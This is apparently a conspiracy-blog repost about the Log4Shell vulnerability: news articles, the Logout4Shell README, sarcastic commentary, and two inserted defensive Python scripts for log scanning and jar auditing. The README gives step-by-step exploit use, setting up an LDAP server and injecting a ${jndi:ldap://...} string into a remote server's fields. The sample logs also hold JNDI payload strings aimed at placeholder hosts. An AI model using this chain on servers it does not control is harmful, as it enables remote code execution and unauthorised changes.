Digital Doomsday Coming – ConspiracyOz

Here it is Ppl ‘Log4Shell’ – Mick Raven

Log4shell software flaw threatens millions of servers as hackers scramble to exploit it

https://www.abc.net.au/
11th Dec 2021

[Image: a padlock on a dark background surrounded by white and light blue binary code.] The extreme ease with which the flaw allows an attacker to access a server is what experts say makes it so dangerous. (Supplied: Accenture)

A critical vulnerability in a widely used software tool — one quickly exploited in the online game Minecraft — is rapidly emerging as a major threat to organisations around the world.

“The internet’s on fire right now,” said Adam Meyers, senior vice-president of intelligence at the cybersecurity firm Crowdstrike.

“People are scrambling to patch [it] and all kinds of people scrambling to exploit it,” he said.

He said on Friday morning, US time, that in the 12 hours since the bug’s existence was disclosed it had been “fully weaponised”, meaning malefactors had developed and distributed tools to exploit it.

The flaw may be the worst computer vulnerability discovered in years.

It was uncovered in an open-source logging tool that is ubiquitous in cloud servers and enterprise software used across industry and government.

Unless it is fixed, it grants criminals, spies and programming novices easy access to internal networks where they can loot valuable data, plant malware, erase crucial information and much more.

“I’d be hard-pressed to think of a company that’s not at risk,” said Joe Sullivan, chief security officer for Cloudflare, whose online infrastructure protects websites from malicious actors.

Millions of servers have the logging tool installed, and experts said the fallout would not be known for several days.

Amit Yoran, CEO of the cybersecurity firm Tenable, called it “the single biggest, most critical vulnerability of the last decade” — and possibly the biggest in the history of modern computing.

No password required

The vulnerability, dubbed Log4Shell, was rated 10 on a scale of one to 10 by the Apache Software Foundation, which oversees development of the tool.

Anyone with the ability to exploit it can obtain full access to an unpatched computer that uses the software.

Experts said the extreme ease with which the vulnerability lets an attacker access a web server — without a password — was what made it so dangerous.

[Image: Lydia Winters stands on stage with signs showing Microsoft's Minecraft game at the Xbox E3 2015 briefing.] Experts say Minecraft users have already exploited the flaw to breach other users by pasting a short message into a chat box. (AP: Damian Dovarganes, file)

New Zealand’s computer emergency response team was among the first to report that the flaw was being “actively exploited in the wild” just hours after it was publicly reported on Thursday and a patch released.

The vulnerability, located in open-source Apache software used to run websites and other web services, was reported to the foundation on November 24 by the Chinese tech giant Alibaba, it said.

It took two weeks to develop and release a fix.

But patching systems around the world could be a complicated task.

While most organisations and cloud providers such as Amazon should be able to update their web servers easily, the same Apache software is also often embedded in third-party programs, which often can only be updated by their owners.

Mr Yoran, of Tenable, said organisations needed to presume they had been compromised and act quickly.

The first obvious signs of the flaw’s exploitation appeared in Minecraft, a Microsoft online game hugely popular with children.

Mr Meyers and security expert Marcus Hutchins said Minecraft users were already using it to execute programs on the computers of other users by pasting a short message in a chat box.

Microsoft said it had issued a software update for Minecraft users.

Researchers reported finding evidence the vulnerability could be exploited in servers run by companies such as Apple, Amazon, Twitter and Cloudflare.

Cloudflare’s Mr Sullivan said there was no indication his company’s servers had been compromised.

Apple, Amazon and Twitter did not immediately respond to requests for comment.

AP

Trust in the Digital God now? – Mick Raven

Researchers release ‘vaccine’ for critical Log4Shell vulnerability

Lawrence Abrams
https://www.bleepingcomputer.com
December 10, 2021

Researchers from cybersecurity firm Cybereason have released a “vaccine” that can be used to remotely mitigate the critical ‘Log4Shell’ Apache Log4j code execution vulnerability running rampant through the Internet.

Apache Log4j is a Java-based logging platform that can be used to analyze web server access logs or application logs. The software is heavily used in the enterprise, eCommerce platforms, and games such as Minecraft, which rushed out a patched version earlier today.

Early this morning, researchers released a proof-of-concept exploit for a zero-day remote code execution vulnerability in Apache Log4j tracked as CVE-2021-44228 and dubbed ‘Log4Shell.’

While Apache quickly released Log4j 2.15.0 to resolve the vulnerability, the vulnerability is trivial to exploit, and cybersecurity firms and researchers quickly saw attackers scan and attempt to compromise vulnerable devices.

As threat actors can exploit this vulnerability by simply changing their web browser’s user-agent string and visiting a vulnerable site, or by searching for that string on a site, it quickly became a nightmare for the enterprise and for some of the most popular websites on the web.
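Because the article says the exploit string can arrive in something as ordinary as a browser user agent or a search query, the first thing a defender can do is look for it in the web server's own access logs. The following is an added example, not code from the article or from any project it names: it scans constructed Combined-Log-Format lines, URL-decodes them (the request path is percent-encoded in the log), and pulls the scheme, host and port out of every ${jndi:<scheme>://<host>:<port>/...} lookup it finds, so the callback hosts can be blocked at the egress firewall or hunted for elsewhere. It only tolerates case differences; a line with no hit means "no obvious probe", not "safe".

```python
"""Scan web-server access logs for the Log4Shell lookup string.

Added example, not code from the article or from any project it names.
The log lines below are constructed; 203.0.113.0/24 and 198.51.100.0/24
are documentation address ranges, and lookup.example is a placeholder host.
"""
import re
from urllib.parse import unquote

# Matches ${jndi:ldap://198.51.100.7:1389/a} and captures scheme, host and
# optional port. IGNORECASE covers "${JNDI:LDAP://...}" spellings.
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^/:}\s]+)(?::(?P<port>\d+))?",
    re.IGNORECASE,
)

# Constructed sample log (Combined Log Format): lines 1, 3 and 4 carry a
# lookup in the user agent, the percent-encoded query string and the
# referer respectively; line 2 is an ordinary request.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 '
    '"-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:14:02:13 +0000] "GET /index.html HTTP/1.1" '
    '200 2048 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Dec/2021:14:02:20 +0000] '
    '"GET /?q=%24%7Bjndi%3Armi%3A%2F%2F198.51.100.7%3A1099%2Fx%7D HTTP/1.1" '
    '200 512 "-" "curl/7.79"',
    '203.0.113.7 - - [10/Dec/2021:14:03:01 +0000] "POST /login HTTP/1.1" 302 0 '
    '"${jndi:LDAP://lookup.example:1389/a}" "Mozilla/5.0"',
]


def find_jndi_probes(line):
    """Return [(scheme, host, port), ...] for every lookup in one log line.

    The line is URL-decoded first so a lookup hidden in the request path
    (which the server logs percent-encoded) is seen as well.
    """
    decoded = unquote(line)
    return [
        (m.group("scheme").lower(), m.group("host"), m.group("port") or "")
        for m in JNDI_RE.finditer(decoded)
    ]


def scan_log(lines):
    """Return [(line_number, [probe, ...]), ...] for lines carrying a lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        probes = find_jndi_probes(line)
        if probes:
            hits.append((number, probes))
    return hits


def probe_hosts(lines):
    """Distinct callback hosts seen in the log, e.g. for an egress block list."""
    return sorted({host for _, probes in scan_log(lines) for _, host, _ in probes})


if __name__ == "__main__":
    for number, probes in scan_log(SAMPLE_LOG):
        print(f"line {number}: {probes}")
    print("callback hosts:", probe_hosts(SAMPLE_LOG))
```

The hosts it reports are where a compromised server would try to fetch its payload from, which is why they matter for outbound filtering; the access log shows only attempts, so a hit says an application was probed, not that the lookup succeeded.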

Vaccine released for Log4Shell

Friday evening, cybersecurity firm Cybereason released a script, or “vaccine,” that exploits the vulnerability to turn off a setting in a remote, vulnerable Log4j instance. Basically, the vaccine fixes the vulnerability by exploiting the vulnerable server.

This project is called ‘Logout4Shell’ and walks you through setting up a Java-based LDAP server and includes a Java payload that will disable the ‘trustURLCodebase’ setting in a remote Log4j server to mitigate the vulnerability.

“While the best mitigation against this vulnerability is to patch log4j to 2.15.0 and above, in Log4j version (>=2.10) this behavior can be mitigated by setting system property log4j2.formatMsgNoLookups to true or by removing the JndiLookup class from the classpath,” Cybereason explains on the Logout4Shell GitHub Page.

“Additionally, if the server has Java runtimes >= 8u121, then by default, the settings com.sun.jndi.rmi.object.trustURLCodebase and com.sun.jndi.cosnaming.object.trustURLCodebase are set to “false”, mitigating this risk.”

This may sound like a helpful tool to quickly neutralize the vulnerability in an environment you manage. Still, there are obvious concerns that threat actors or grey hat hackers will co-opt it for illegal behavior.

It is common for threat actors to breach a device and patch vulnerabilities to block other hackers from taking over a compromised server.

There is also concern that security researchers may use the vulnerability to remotely fix servers, even though doing something like this is considered illegal.

However, this has not stopped grey hats from using exploits to take vulnerable devices offline. In the past, we saw the BrickerBot malware take vulnerable routers offline, and grey hats exploiting Internet-connected printers to issue warnings to take them offline.

When we asked Cybereason if they were concerned their Logout4Shell project could be abused, Cybereason CTO Yonatan Striem-Amit told BleepingComputer that they believe the benefits outweigh the potential for abuse in this situation.

“While always a possibility, it’s an issue of a calculated risk. This vulnerability is so critical and already massively abused across the Internet, we felt compelled to offer something to help defenders across the globe buy precious time against these hackers.

From an impact perspective, it’s very similar to the Apache Struts vulnerability that was used to steal information from Equifax in May-July 2017.” – Yonatan Striem-Amit, CTO and Co-founder, Cybereason.

If you are interested in trying out Logout4Shell, you can visit the project’s GitHub page.

Vaccine released for the Digital Virus?………BAHAHAHA! I say – Mick Raven

GitHub

https://github.com/Cybereason/Logout4Shell

Dec 2021

Logout4Shell


Description

A vulnerability impacting Apache Log4j versions 2.0 through 2.14.1 was disclosed on the project’s GitHub on December 9, 2021. The flaw has been dubbed “Log4Shell,” and has the highest possible severity rating of 10. Software made or managed by the Apache Software Foundation (from here on just “Apache”) is pervasive and comprises nearly a third of all web servers in the world—making this a potentially catastrophic flaw. The Log4Shell vulnerability CVE-2021-44228 was published on 12/9/2021 and allows remote code execution on vulnerable servers.

While the best mitigation against this vulnerability is to patch log4j to 2.15.0 and above, in Log4j version (>=2.10) this behavior can be mitigated by setting system property log4j2.formatMsgNoLookups to true or by removing the JndiLookup class from the classpath. Additionally, if the server has Java runtimes >= 8u121, then by default, the settings com.sun.jndi.rmi.object.trustURLCodebase and com.sun.jndi.cosnaming.object.trustURLCodebase are set to “false”, mitigating this risk.

However, enabling these system properties requires access to the vulnerable servers as well as a restart. The Cybereason research team has developed the following code that exploits the same vulnerability, and the payload therein forces the logger to reconfigure itself with the vulnerable setting disabled. This effectively blocks any further attempt to exploit Log4Shell on this server.
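The README above, like the BleepingComputer article before it, names three things an administrator can check on a server they control: the log4j-core version (2.15.0 and above is the fix the page names), whether the JndiLookup class is still on the classpath, and the log4j2.formatMsgNoLookups property. The following is an added example, not Cybereason's code and not part of Log4j: a Python audit that opens a log4j-core jar, reads its version from the manifest (falling back to the file name), reports whether JndiLookup.class is present, and can strip that class from the jar, which is the "remove the JndiLookup class from the classpath" mitigation the page describes. The fixed-version threshold is a parameter so it can be raised to whatever the current Apache advisory recommends. The sample jars it audits are constructed stand-ins, not real Log4j builds.

```python
"""Audit a log4j-core jar for the Log4Shell exposure described on the page.

Added example, not Cybereason's or Log4j's own code. The jars built by
make_sample_jar() are constructed stand-ins containing only a manifest and
a placeholder class entry, so the script runs offline.
"""
import io
import os
import re
import tempfile
import zipfile

# Class the page says can be removed from the classpath as a mitigation.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Version the page names as the fix; raise it if a later advisory says so.
FIXED_VERSION = (2, 15, 0)
FILENAME_RE = re.compile(r"log4j-core-(\d+)\.(\d+)\.(\d+)\.jar$")
MANIFEST_RE = re.compile(r"^Implementation-Version:\s*(\d+)\.(\d+)\.(\d+)", re.M)


def jar_version(path):
    """Version tuple from META-INF/MANIFEST.MF, else from the file name, else None."""
    with zipfile.ZipFile(path) as zf:
        try:
            manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
        except KeyError:
            manifest = ""
    m = MANIFEST_RE.search(manifest) or FILENAME_RE.search(os.path.basename(path))
    return tuple(int(x) for x in m.groups()) if m else None


def audit_jar(path, fixed=FIXED_VERSION):
    """Describe one jar: version, presence of JndiLookup, and overall exposure."""
    version = jar_version(path)
    with zipfile.ZipFile(path) as zf:
        has_jndi = JNDI_LOOKUP_CLASS in zf.namelist()
    old_version = version is not None and version < fixed
    return {
        "path": path,
        "version": version,
        "jndi_lookup_present": has_jndi,
        # Exposed only when the version predates the fix AND the lookup class
        # is still there; an unknown version is reported but not flagged.
        "exposed": old_version and has_jndi,
    }


def strip_jndi_lookup(path):
    """Rewrite the jar without JndiLookup.class. Returns True if it was removed."""
    with zipfile.ZipFile(path) as src:
        if JNDI_LOOKUP_CLASS not in src.namelist():
            return False
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as dst:
            for item in src.infolist():
                if item.filename != JNDI_LOOKUP_CLASS:
                    dst.writestr(item, src.read(item.filename))
    with open(path, "wb") as f:
        f.write(buf.getvalue())
    return True


def make_sample_jar(directory, version, with_jndi=True):
    """Constructed stand-in for a log4j-core jar (manifest plus placeholder class)."""
    path = os.path.join(directory, f"log4j-core-{version}.jar")
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        if with_jndi:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # placeholder bytes
    return path


def demo():
    """Audit a pre-fix and a fixed sample jar; returns (before, after, fixed) exposure flags."""
    with tempfile.TemporaryDirectory() as d:
        old = make_sample_jar(d, "2.14.1")
        new = make_sample_jar(d, "2.15.0")
        before = audit_jar(old)["exposed"]
        strip_jndi_lookup(old)
        after = audit_jar(old)["exposed"]
        return before, after, audit_jar(new)["exposed"]


if __name__ == "__main__":
    print(demo())  # (True, False, False)
```

Stripping the class from the jar on disk changes nothing in a JVM that is already running; as the README notes for the system property, the application has to be restarted before the change takes effect, and the same audit should then be repeated against the jars the live process actually loaded, since third-party software often bundles its own copy.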

You can learn more here

How it works

The payload and exploit below use the Java runtime to reconfigure the logger. Before the logger is reconfigured, the global setting FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS is set to true, which disables message format lookups and prevents further exploitation of this attack.

How to use

  1. Download this repo and build it

    1.1 git clone https://github.com/cybereason/Logout4Shell.git

    1.2 build it: mvn package

    1.3 cd target/classes

    1.4 run the web server: python3 -m http.server 8888

  2. Download, build and run Marshalsec’s LDAP server

    2.1 git clone https://github.com/mbechler/marshalsec.git

    2.2 mvn package -DskipTests

    2.3 java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://<IP_OF_PYTHON_SERVER_FROM_STEP_1>:8888/#Log4jRCE"

  3. To immunize a server

    3.1 enter ${jndi:ldap://<IP_OF_LDAP_SERVER_FROM_STEP_2>:1389/a} into a vulnerable field (such as user name)

DISCLAIMER:

The code described in this advisory (the “Code”) is provided on an “as is” and “as available” basis and may contain bugs, errors and other defects. You are advised to safeguard important data and to use caution. By using this Code, you agree that Cybereason shall have no liability to you for any claims in connection with the Code. Cybereason disclaims any liability for any direct, indirect, incidental, punitive, exemplary, special or consequential damages, even if Cybereason or its related parties are advised of the possibility of such damages. Cybereason undertakes no duty to update the Code or this advisory.

Credits

The initial repo and inspiration for this work is based on the work of tangxiaofeng7/apache-log4j-poc

Posted on December 12, 2021, in ConspiracyOz Posts.
